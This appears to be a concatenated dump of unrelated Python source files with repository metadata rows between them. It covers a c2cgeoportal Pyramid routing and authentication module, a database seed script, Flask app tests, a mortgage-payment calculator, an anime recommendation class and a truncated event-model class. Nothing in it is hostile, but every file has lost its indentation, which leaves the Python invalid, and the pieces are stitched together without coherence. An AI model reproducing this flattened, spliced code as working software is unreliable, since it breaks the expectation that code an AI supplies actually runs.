INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo"
def add_interface(
config, interface_name=None, interface_type=INTERFACE_TYPE_CGXP, **kwargs
): # pragma: nocover
if interface_type == INTERFACE_TYPE_CGXP:
if interface_name is None:
add_interface_cgxp(
config,
interface_name="main",
route_names=("home", "viewer"),
routes=("/", "/viewer.js"),
renderers=("index.html", "viewer.js"),
)
else:
add_interface_cgxp(
config,
interface_name=interface_name,
route_names=(interface_name, interface_name + ".js"),
routes=("/%s" % interface_name, "/%s.js" % interface_name),
renderers=("/%s.html" % interface_name, "/%s.js" % interface_name),
)
elif interface_type == INTERFACE_TYPE_NGEO:
route = "/" if interface_name == "desktop" else "/%s" % interface_name
add_interface_ngeo(
config,
interface_name=interface_name,
route_name=interface_name,
route=route,
renderer="/%s.html" % interface_name,
)
def add_interface_cgxp(config, interface_name, route_names, routes, renderers): # pragma: nocover
# Cannot be at the header to don"t load the model too early
from c2cgeoportal.views.entry import Entry
def add_interface(f):
def new_f(root, request):
request.interface_name = interface_name
return f(root, request)
return new_f
config.add_route(route_names[0], routes[0])
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_index_vars",
route_name=route_names[0],
renderer=renderers[0]
)
# permalink theme: recover the theme for generating custom viewer.js url
config.add_route(
"%stheme" % route_names[0],
"%s%stheme/*themes" % (routes[0], "" if routes[0][-1] == "/" else "/"),
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_permalinktheme_vars",
route_name="%stheme" % route_names[0],
renderer=renderers[0]
)
config.add_route(
route_names[1], routes[1],
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_cgxp_viewer_vars",
route_name=route_names[1],
renderer=renderers[1]
)
ngeo_static_init = False
def add_interface_ngeo(config, interface_name, route_name, route, renderer): # pragma: nocover
# Cannot be at the header to don't load the model too early
from c2cgeoportal.views.entry import Entry
def add_interface(f):
def new_f(root, request):
request.interface_name = interface_name
return f(root, request)
return new_f
config.add_route(route_name, route, request_method="GET")
config.add_view(
Entry,
decorator=add_interface,
attr="get_ngeo_index_vars",
route_name=route_name,
renderer=renderer
)
# permalink theme: recover the theme for generating custom viewer.js url
config.add_route(
"%stheme" % route_name,
"%s%stheme/*themes" % (route, "" if route[-1] == "/" else "/"),
request_method="GET",
)
config.add_view(
Entry,
decorator=add_interface,
attr="get_ngeo_permalinktheme_vars",
route_name="%stheme" % route_name,
renderer=renderer
)
global ngeo_static_init
if not ngeo_static_init:
add_static_view_ngeo(config)
ngeo_static_init = True
def add_static_view_ngeo(config): # pragma: nocover
""" Add the project static view for ngeo """
package = config.get_settings()["package"]
_add_static_view(config, "proj-ngeo", "%s:static-ngeo" % package)
config.override_asset(
to_override="c2cgeoportal:project/",
override_with="%s:static-ngeo/" % package
)
config.add_static_view(
name=package,
path="%s:static" % package,
cache_max_age=int(config.get_settings()["default_max_age"])
)
config.add_static_view("node_modules", config.get_settings().get("node_modules_path"))
config.add_static_view("closure", config.get_settings().get("closure_library_path"))
mimetypes.add_type("text/css", ".less")
def add_admin_interface(config):
if config.get_settings().get("enable_admin_interface", False):
config.formalchemy_admin(
route_name="admin",
package=config.get_settings()["package"],
view="fa.jquery.pyramid.ModelView",
factory=FAModels
)
def add_static_view(config):
""" Add the project static view for CGXP """
package = config.get_settings()["package"]
_add_static_view(config, "proj", "%s:static" % package)
config.override_asset(
to_override="c2cgeoportal:project/",
override_with="%s:static/" % package
)
CACHE_PATH = []
def _add_static_view(config, name, path):
from c2cgeoportal.lib.cacheversion import version_cache_buster
config.add_static_view(
name=name,
path=path,
cache_max_age=int(config.get_settings()["default_max_age"]),
)
config.add_cache_buster(path, version_cache_buster)
CACHE_PATH.append(unicode(name))
def locale_negotiator(request):
lang = request.params.get("lang")
if lang is None:
# if best_match returns None then use the default_locale_name configuration variable
return request.accept_language.best_match(
request.registry.settings.get("available_locale_names"),
default_match=request.registry.settings.get("default_locale_name"))
return lang
def _match_url_start(ref, val):
"""
Checks that the val URL starts like the ref URL.
"""
ref_parts = ref.rstrip("/").split("/")
val_parts = val.rstrip("/").split("/")[0:len(ref_parts)]
return ref_parts == val_parts
def _is_valid_referer(referer, settings):
if referer:
list = settings.get("authorized_referers", [])
return any(_match_url_start(x, referer) for x in list)
else:
return False
def _create_get_user_from_request(settings):
def get_user_from_request(request):
""" Return the User object for the request.
Return ``None`` if:
* user is anonymous
* it does not exist in the database
* the referer is invalid
"""
from c2cgeoportal.models import DBSession, User
# disable the referer check for the admin interface
if not (
request.path_info_peek() == "admin" and request.referer is None or
_is_valid_referer(request.referer, settings)
):
if request.referer is not None:
log.warning("Invalid referer for %s: %s", request.path_qs,
repr(request.referer))
return None
if not hasattr(request, "_user"):
request._user = None
username = request.authenticated_userid
if username is not None:
# We know we will need the role object of the
# user so we use joined loading
request._user = DBSession.query(User) \
.filter_by(username=username) \
.first()
return request._user
return get_user_from_request
def set_user_validator(config, user_validator):
""" Call this function to register a user validator function.
The validator function is passed three arguments: ``request``,
``username``, and ``password``. The function should return the
user name if the credentials are valid, and ``None`` otherwise.
The validator should not do the actual authentication operation
by calling ``remember``, this is handled by the ``login`` view.
"""
def register():
config.registry.validate_user = user_validator
config.action("user_validator", register)
def default_user_validator(request, username, password):
"""
Validate the username/password. This is c2cgeoportal's
default user validator.
Return none if we are anonymous, the string to remember otherwise.
"""
from c2cgeoportal.models import DBSession, User
user = DBSession.query(User).filter_by(username=username).first()
return username if user and user.validate_password(password) else None
class OgcproxyRoutePredicate:
""" Serve as a custom route predicate function for ogcproxy.
We do not want the OGC proxy to be used to reach the app's
mapserv script. We just return False if the url includes
"mapserv". It is rather drastic, but works for us. """
def __init__(self, val, config):
self.private_networks = [
Network("127.0.0.0/8"),
Network("10.0.0.0/8"),
Network("172.16.0.0/12"),
Network("192.168.0.0/16"),
]
def __call__(self, context, request):
url = request.params.get("url")
if url is None:
return False
parts = urlsplit(url)
try:
ip = IP(gethostbyname(parts.netloc))
except gaierror as e:
log.info("Unable to get host name for %s: %s" % (url, e))
return False
for net in self.private_networks:
if ip in net:
return False
return True
def phash(self): # pragma: nocover
return ""
class MapserverproxyRoutePredicate:
""" Serve as a custom route predicate function for mapserverproxy.
If the hide_capabilities setting is set and is true then we want to
return 404s on GetCapabilities requests."""
def __init__(self, val, config):
pass
def __call__(self, context, request):
hide_capabilities = request.registry.settings.get("hide_capabilities")
if not hide_capabilities:
return True
params = dict(
(k.lower(), unicode(v).lower()) for k, v in request.params.iteritems()
)
return "request" not in params or params["request"] != u"getcapabilities"
def phash(self):
return ""
def add_cors_route(config, pattern, service):
"""
Add the OPTIONS route and view need for services supporting CORS.
"""
def view(request): # pragma: nocover
from c2cgeoportal.lib.caching import set_common_headers, NO_CACHE
return set_common_headers(request, service, NO_CACHE)
name = pattern + "_options"
config.add_route(name, pattern, request_method="OPTIONS")
config.add_view(view, route_name=name)
def error_handler(http_exception, request): # pragma: nocover
"""
View callable for handling all the exceptions that are not already handled.
"""
log.warning("%s returned status code %s", request.url,
http_exception.status_code)
return caching.set_common_headers(
request, "error", caching.NO_CACHE, http_exception, vary=True
)
def call_hook(settings, name, *args, **kwargs):
hooks = settings.get("hooks", {})
hook = hooks.get(name, None)
if hook is None:
return
parts = hook.split(".")
module = importlib.import_module(".".join(parts[0:-1]))
function = getattr(module, parts[-1])
function(*args, **kwargs)
def includeme(config):
""" This function returns a Pyramid WSGI application.
"""
# update the settings object from the YAML application config file
settings = config.get_settings()
settings.update(c2c.template.get_config(settings.get("app.cfg")))
call_hook(settings, "after_settings", settings)
global srid
global schema
global parentschema
global formalchemy_language
global formalchemy_default_zoom
global formalchemy_default_x
global formalchemy_default_y
global formalchemy_available_functionalities
global formalchemy_available_metadata
config.add_request_method(_create_get_user_from_request(settings),
name="user", property=True)
# configure 'locale' dir as the translation dir for c2cgeoportal app
config.add_translation_dirs("c2cgeoportal:locale/")
# initialize database
engine = sqlalchemy.engine_from_config(
settings,
"sqlalchemy.")
sqlahelper.add_engine(engine)
config.include(pyramid_tm.includeme)
config.include("pyramid_closure")
# initialize the dbreflection module
dbreflection.init(engine)
# dogpile.cache configuration
caching.init_region(settings["cache"])
caching.invalidate_region()
# Register a tween to get back the cache buster path.
config.add_tween("c2cgeoportal.lib.cacheversion.CachebusterTween")
# bind the mako renderer to other file extensions
add_mako_renderer(config, ".html")
add_mako_renderer(config, ".js")
config.include("pyramid_chameleon")
# add the "geojson" renderer
config.add_renderer("geojson", GeoJSON())
# add decimal json renderer
config.add_renderer("decimaljson", DecimalJSON())
# add the "xsd" renderer
config.add_renderer("xsd", XSD(
sequence_callback=dbreflection._xsd_sequence_callback
))
# add the set_user_validator directive, and set a default user
# validator
config.add_directive("set_user_validator", set_user_validator)
config.set_user_validator(default_user_validator)
if settings.get("ogcproxy_enable", False): # pragma: nocover
# add an OGCProxy view
config.add_route_predicate("ogc_server", OgcproxyRoutePredicate)
config.add_route(
"ogcproxy", "/ogcproxy",
ogc_server=True
)
config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy")
# add routes to the mapserver proxy
config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate)
config.add_route(
"mapserverproxy", "/mapserv_proxy",
mapserverproxy=True, pregenerator=C2CPregenerator(role=True),
)
# add route to the tinyows proxy
config.add_route(
"tinyowsproxy", "/tinyows_proxy",
pregenerator=C2CPregenerator(role=True),
)
# add routes to csv view
config.add_route("csvecho", "/csv", request_method="POST")
# add route to the export GPX/KML view
config.add_route("exportgpxkml", "/exportgpxkml")
# add routes to the echo service
config.add_route("echo", "/echo", request_method="POST")
# add routes to the entry view class
config.add_route("base", "/", static=True)
config.add_route("loginform", "/login.html", request_method="GET")
add_cors_route(config, "/login", "login")
config.add_route("login", "/login", request_method="POST")
add_cors_route(config, "/logout", "login")
config.add_route("logout", "/logout", request_method="GET")
add_cors_route(config, "/loginchange", "login")
config.add_route("loginchange", "/loginchange", request_method="POST")
add_cors_route(config, "/loginresetpassword", "login")
config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST")
add_cors_route(config, "/loginuser", "login")
config.add_route("loginuser", "/loginuser", request_method="GET")
config.add_route("testi18n", "/testi18n.html", request_method="GET")
config.add_route("apijs", "/api.js", request_method="GET")
config.add_route("xapijs", "/xapi.js", request_method="GET")
config.add_route("apihelp", "/apihelp.html", request_method="GET")
config.add_route("xapihelp", "/xapihelp.html", request_method="GET")
config.add_route(
"themes", "/themes",
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_route("invalidate", "/invalidate", request_method="GET")
# checker routes, Checkers are web services to test and assess that
# the application is correctly functioning.
# These web services are used by tools like (nagios).
config.add_route("checker_routes", "/checker_routes", request_method="GET")
config.add_route("checker_lang_files", "/checker_lang_files", request_method="GET")
config.add_route("checker_pdf3", "/checker_pdf3", request_method="GET")
config.add_route("checker_fts", "/checker_fts", request_method="GET")
config.add_route("checker_theme_errors", "/checker_theme_errors", request_method="GET")
config.add_route("checker_phantomjs", "/checker_phantomjs", request_method="GET")
# collector
config.add_route("check_collector", "/check_collector", request_method="GET")
# print proxy routes
config.add_route("printproxy", "/printproxy", request_method="HEAD")
add_cors_route(config, "/printproxy/*all", "print")
config.add_route(
"printproxy_capabilities", "/printproxy/capabilities.json",
request_method="GET", pregenerator=C2CPregenerator(role=True),
)
config.add_route(
"printproxy_report_create", "/printproxy/report.{format}",
request_method="POST", header=JSON_CONTENT_TYPE
)
config.add_route(
"printproxy_status", "/printproxy/status/{ref}.json",
request_method="GET"
)
config.add_route(
"printproxy_cancel", "/printproxy/cancel/{ref}",
request_method="DELETE"
)
config.add_route(
"printproxy_report_get", "/printproxy/report/{ref}",
request_method="GET"
)
# full text search routes
add_cors_route(config, "/fulltextsearch", "fulltextsearch")
config.add_route("fulltextsearch", "/fulltextsearch")
# Access to raster data
add_cors_route(config, "/raster", "raster")
config.add_route("raster", "/raster", request_method="GET")
add_cors_route(config, "/profile.{ext}", "profile")
config.add_route("profile.csv", "/profile.csv", request_method="POST")
config.add_route("profile.json", "/profile.json", request_method="POST")
# shortener
config.add_route("shortener_create", "/short/create", request_method="POST")
config.add_route("shortener_get", "/short/{ref}", request_method="GET")
# Geometry processing
config.add_route("difference", "/difference", request_method="POST")
# PDF report tool
config.add_route("pdfreport", "/pdfreport/{layername}/{id}", request_method="GET")
# add routes for the "layers" web service
add_cors_route(config, "/layers/*all", "layers")
config.add_route(
"layers_count", "/layers/{layer_id:\\d+}/count",
request_method="GET"
)
config.add_route(
"layers_metadata", "/layers/{layer_id:\\d+}/md.xsd",
request_method="GET",
pregenerator=C2CPregenerator(role=True),
)
config.add_route(
"layers_read_many",
"/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}",
request_method="GET") # supports URLs like /layers/1,2,3
config.add_route(
"layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="GET")
config.add_route(
"layers_create", "/layers/{layer_id:\\d+}",
request_method="POST", header=JSON_CONTENT_TYPE)
config.add_route(
"layers_update", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="PUT", header=JSON_CONTENT_TYPE)
config.add_route(
"layers_delete", "/layers/{layer_id:\\d+}/{feature_id}",
request_method="DELETE")
config.add_route(
"layers_enumerate_attribute_values",
"/layers/{layer_name}/values/{field_name}",
request_method="GET",
pregenerator=C2CPregenerator(),
)
# there's no view corresponding to that route, it is to be used from
# mako templates to get the root of the "layers" web service
config.add_route("layers_root", "/layers/", request_method="HEAD")
# Resource proxy (load external url, useful when loading non https content)
config.add_route("resourceproxy", "/resourceproxy", request_method="GET")
# pyramid_formalchemy's configuration
config.include("pyramid_formalchemy")
config.include("fa.jquery")
# define the srid, schema and parentschema
# as global variables to be usable in the model
srid = settings["srid"]
schema = settings["schema"]
parentschema = settings["parentschema"]
formalchemy_default_zoom = get_setting(
settings,
("admin_interface", "map_zoom"), formalchemy_default_zoom)
formalchemy_default_x = get_setting(
settings,
("admin_interface", "map_x"), formalchemy_default_x)
formalchemy_default_y = get_setting(
settings,
("admin_interface", "map_y"), formalchemy_default_y)
formalchemy_available_functionalities = get_setting(
settings,
("admin_interface", "available_functionalities"),
formalchemy_available_functionalities)
formalchemy_available_metadata = get_setting(
settings,
("admin_interface", "available_metadata"),
formalchemy_available_metadata)
config.add_route("checker_all", "/checker_all", request_method="GET")
config.add_route("version_json", "/version.json", request_method="GET")
stats.init(config)
# scan view decorator for adding routes
config.scan(ignore=["c2cgeoportal.tests", "c2cgeoportal.scripts"])
config.registry.registerUtility(
MultiDomainStaticURLInfo(), IStaticURLInfo)
# add the static view (for static resources)
_add_static_view(config, "static", "c2cgeoportal:static")
_add_static_view(config, "project", "c2cgeoportal:project")
add_admin_interface(config)
add_static_view(config)
# Handles the other HTTP errors raised by the views. Without that,
# the client receives a status=200 without content.
config.add_view(error_handler, context=HTTPException)
| 35.586592 | 98 | 0.672567 | 3,060 | 25,480 | 5.395098 | 0.19281 | 0.045248 | 0.051729 | 0.022654 | 0.279666 | 0.229814 | 0.162336 | 0.124962 | 0.110849 | 0.107759 | 0 | 0.006095 | 0.220879 | 25,480 | 715 | 99 | 35.636364 | 0.825509 | 0.206279 | 0 | 0.222917 | 0 | 0 | 0.171229 | 0.044174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06875 | false | 0.010417 | 0.052083 | 0.004167 | 0.18125 | 0.014583 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eaf5d71da4aea86f6032fa830b38828a3ca197e | 1,102 | py | Python | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | import sys
import pathlib
from datetime import datetime
current_dir = pathlib.Path(__file__).resolve().parent
sys.path.append( str(current_dir) + '/../../' )
from app.database import BASE, ENGINE, session_scope
from app.models.todos import Todo
from app.models.users import User
def generate_seed_data():
BASE.metadata.create_all(ENGINE)
users = [["太郎"], ["次郎"], ["花子"]]
todos = [
[1, "title1", "description1", datetime.now()],
[1, "title2", "description2", datetime.now()],
[2, "title3", "description3", datetime.now()],
[2, "title4", "description4", datetime.now()],
[3, "title5", "description5", datetime.now()],
[3, "title6", "description6", datetime.now()]
]
with session_scope() as session:
for user in users:
session.add(User(user[0]))
for todo in todos:
session.add(Todo(
user_id = todo[0],
title = todo[1],
description = todo[2],
deadline = todo[3]
))
if __name__ == "__main__":
generate_seed_data()
| 29.783784 | 54 | 0.57804 | 125 | 1,102 | 4.92 | 0.504 | 0.107317 | 0.042276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02836 | 0.264065 | 1,102 | 36 | 55 | 30.611111 | 0.729963 | 0 | 0 | 0 | 0 | 0 | 0.11706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.193548 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eaf99475c5184ec13f9c69b29833abb9f843b06 | 3,217 | py | Python | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | null | null | null | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | 5 | 2019-11-04T09:00:39.000Z | 2021-03-30T06:44:26.000Z | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
import os
import os.path
import json
import platform
import tempfile
import logging
if platform.python_version() < '2.7':
import unittest2 as unittest
else:
import unittest
from rogue_scores.web import app
from rogue_scores.web.app import index, scores_upload, scores_json
class FakeRequest(object):
scores = '[]'
def __init__(self, *args, **kwargs):
self.form = {'scores': FakeRequest.scores}
self.headers = {}
self.args = {}
app.app.logger.handlers = [logging.FileHandler('/dev/null')]
class TestRogueWeb(unittest.TestCase):
def setUp(self):
self._scores = app.app.config['SCORES']
self._req = app.request
self.tmp = tempfile.NamedTemporaryFile(delete=False)
app.request = FakeRequest()
app.app.config['SCORES'] = self.tmp.name
self.json = json.dumps([
{'user': 'foo', 'level': 42, 'cause': 'bar',
'status': 'killed', 'score': 24},
{'user': 'moo', 'level': 25, 'cause': 'qwe',
'status': 'killed', 'score': 255}
]).encode('utf-8')
self.tmp.write(self.json)
self.tmp.close()
def tearDown(self):
app.app.config['SCORES'] = self._scores
app.request = self._req
if os.path.isfile(self.tmp.name):
os.unlink(self.tmp.name)
def getScores(self):
with open(self.tmp.name) as f:
return json.loads(f.read())
# == .index == #
def test_index_no_score(self):
os.unlink(self.tmp.name)
with app.app.app_context():
ret = index()
self.assertRegexpMatches(ret, r'</th>\s*</tr>\s*</table>')
# == .scores_upload == #
def test_scores_upload_wrong_json(self):
FakeRequest.scores = '}w$'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('wrong json', ret)
def test_scores_upload_no_scores(self):
FakeRequest.scores = '[]'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('ok', ret)
def test_scores_upload_new_scores(self):
FakeRequest.scores = '[["myname", 50, "killed by a foo on level 43"]]'
app.request = FakeRequest()
with app.app.app_context():
ret = scores_upload()
self.assertEquals('ok', ret)
d = {'user': 'myname', 'level': 43,
'status': 'killed', 'cause': 'foo', 'score': 50}
self.assertEquals(d, self.getScores()[0])
# == .scores_json == #
def test_scores_json(self):
with app.app.app_context():
resp = scores_json()
self.assertEquals(json.loads(self.json.decode('utf-8')),
json.loads(resp.data.decode('utf-8')))
def test_scores_pretty_json(self):
app.request = self._req
with app.app.test_request_context('/scores?pretty=1'):
resp = scores_json()
txt = resp.data.decode('utf-8')
self.assertEquals(json.loads(self.json.decode('utf-8')),
json.loads(txt))
self.assertRegexpMatches(txt, '^\[\n +\{')
| 30.638095 | 78 | 0.5788 | 385 | 3,217 | 4.711688 | 0.285714 | 0.049614 | 0.033076 | 0.035832 | 0.305402 | 0.194598 | 0.181918 | 0.181918 | 0.181918 | 0.181918 | 0 | 0.011869 | 0.266708 | 3,217 | 104 | 79 | 30.932692 | 0.7571 | 0.023624 | 0 | 0.271605 | 0 | 0 | 0.093231 | 0.007663 | 0 | 0 | 0 | 0 | 0.098765 | 1 | 0.123457 | false | 0 | 0.123457 | 0 | 0.296296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb1ed9124daee9f997f42d027fa2279f05ec66b | 3,162 | py | Python | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | """
Investment
created by Herman Tai 3/20/2008
"""
from math import *
TOLERANCE = 0.0000001
def equals(n1,n2):
return abs(n1-n2) <TOLERANCE
def calculate_monthly_payment(principle,year,rate_percent):
terms = year * 12.0
rate = rate_percent/100.0
monthly_rate = rate/12.0
# special case
if monthly_rate == 0:
return principle/terms
z = 1+monthly_rate
pmt = principle * z**terms * (z-1)/(z**terms-1)
return pmt
def calculate_principle(pmt, years, rate_percent):
terms = years * 12.0
monthly_rate = (rate_percent / 100.0) / 12.0
z = 1+monthly_rate
if z == 1:
return pmt * terms
p = ( (z**terms - 1)*pmt )/( (z-1)*z**terms )
return p
def calculate_years(principle, pmt, rate_percent):
monthly_rate = (rate_percent / 100.0) / 12.0
top_part = ( log(pmt) - log(pmt - principle*monthly_rate) )
bottom_part = log(1+monthly_rate)
terms = top_part/bottom_part
return terms/12.0
def number_format(num, places=0):
"""Format a number with grouped thousands and given decimal places"""
places = max(0,places)
tmp = "%.*f" % (places, num)
point = tmp.find(".")
integer = (point == -1) and tmp or tmp[:point]
decimal = (point != -1) and tmp[point:] or ""
count = 0
formatted = []
for i in range(len(integer), 0, -1):
count += 1
formatted.append(integer[i - 1])
if count % 3 == 0 and i - 1:
formatted.append(",")
integer = "".join(formatted[::-1])
return integer+decimal
class RealEstateInvestment:
def __init__(self, price, years, apr, monthly_expense=0, annual_expense_percent=0, appreciation=0, inflation=0, one_time_expense=0, down_payment=0,rent=0):
self.price = float(price)
self.years = float(years)
self.apr = float(apr)
self.monthly_expense = float(monthly_expense)
self.annual_expense_percent = float(annual_expense_percent)
self.appreciation = float(appreciation)
self.inflation = float(inflation)
self.one_time_expense = float(one_time_expense)
self.down_payment = float(down_payment)
self.rent = float(rent)
def get_noi(self, yr=1):
if yr == 1:
expense = self.down_payment + self.one_time_expense
else:
expense = 0
expense += self.get_annual_expense(yr)
expense += self.get_mortgage_payment() * 12
income = self.get_rent(yr) * 12
return income - expense
def get_monthly_expense(self, yr=1):
inflation_p = self.inflation / 100.0
return self.monthly_expense * (1+inflation_p) ** (yr-1)
def get_annual_expense(self, yr=1):
return self.get_asset_value(yr)*self.annual_expense_percent / 100 + self.get_monthly_expense(yr)
def get_asset_value(self, yr=1):
return self.price * (1 + self.appreciation/100)**(yr-1)
def get_rent(self,yr=1):
return self.rent * (1 + self.inflation/100.0)**(yr-1)
def get_mortgage_payment(self):
mortgage_payment = calculate_monthly_payment(self.price-self.down_payment,self.years,self.apr)
return mortgage_payment
| 31.62 | 159 | 0.63852 | 444 | 3,162 | 4.373874 | 0.207207 | 0.013903 | 0.018023 | 0.027806 | 0.065911 | 0.029866 | 0.029866 | 0.029866 | 0 | 0 | 0 | 0.045209 | 0.237508 | 3,162 | 99 | 160 | 31.939394 | 0.760265 | 0.038267 | 0 | 0.053333 | 0 | 0 | 0.001982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.013333 | 0.053333 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb2a4b31e0e2b5fb4e1538f458c2107162096b7 | 1,544 | py | Python | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | import requests
import json
from Sakurajima.models import base_models as bm
class RecommendationEntry(object):
def __init__(self, data_dict, headers, cookies, api_url):
self.__headers = headers
self.__cookies = cookies
self.__API_URL = api_url
self.title = data_dict.get("title", None)
self.episodes_max = data_dict.get("episodes_max", None)
self.type = data_dict.get("type", None)
self.anime_id = data_dict.get("detail_id", None)
self.cover = data_dict.get("cover", None)
self.airing_start = data_dict.get("airing_start", None)
self.recommendations = data_dict.get("recommendations", None)
self.d_status = data_dict.get("d_status", None)
self.has_special = data_dict.get("hasSpecial", None)
self.progress = data_dict.get("progress", None)
self.cur_episodes = data_dict.get("cur_episodes", None)
def __post(self, data):
with requests.post(
self.__API_URL, headers=self.__headers, json=data, cookies=self.__cookies
) as url:
return json.loads(url.text)
def __repr__(self):
return f"<RecommendationEntry: {self.title}>"
def get_anime(self):
data = {
"controller": "Anime",
"action": "getAnime",
"detail_id": str(self.anime_id),
}
return bm.Anime(
self.__post(data)["anime"],
headers=self.__headers,
cookies=self.__cookies,
api_url=self.__API_URL,
)
| 35.090909 | 85 | 0.619171 | 189 | 1,544 | 4.724868 | 0.275132 | 0.107503 | 0.135498 | 0.038074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262953 | 1,544 | 43 | 86 | 35.906977 | 0.78471 | 0 | 0 | 0 | 0 | 0 | 0.115285 | 0.013601 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.078947 | 0.026316 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb329a5034df522f053c63062da9cdf64fd7143 | 3,620 | py | Python | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | null | null | null | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | 13 | 2021-03-25T22:24:38.000Z | 2022-03-12T00:56:45.000Z | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | 1 | 2019-03-13T09:49:56.000Z | 2019-03-13T09:49:56.000Z | """Events separate segements of data. A model is fitted to each segment independently"""
import numpy as np
class InvalidPeriod(Exception): pass
class event(object):
def __init__(self, date):
self.date = date
def period_range(min_date, max_date, events, index):
if index > len(events): raise InvalidPeriod('Not enough events to generate period %s' % index)
dates = []
dates.append(min_date)
if len(events) > 0: dates.extend([e.date for e in events])
dates.append(max_date)
dates.sort()
return {'from': dates[index], 'to': dates[index+1]}
def period_data(data, events, i):
min_date, max_date = np.min(data['date']), np.max(data['date'])
p_range = period_range(min_date, max_date, events, i)
if i == 0: from_indices = (data['date'] >= min_date)
else: from_indices = (data['date'] >= events[i - 1].date)
if i == len(events): to_indices = (data['date'] <= max_date)
else: to_indices = (data['date'] < events[i].date)
return data[from_indices & to_indices]
def periods(data, events, model):
"""Generate a list of model instances for each subset of data"""
result = []
for i in range(len(events)+1):
p_data = period_data(data, events, i)
result.append(model(p_data))
return result
class event_model(object):
"""Fits the given data to the given model but allows for events to be added which segment the modelling"""
def __init__(self, data):
self.model = model
self.data = data
self.events = []
self._recalculate()
def _recalculate(self):
"""regenerate all internal models based on event dates and saved input data"""
# self.periods = periods(self.data, self.events, self.model)
self.periods = []
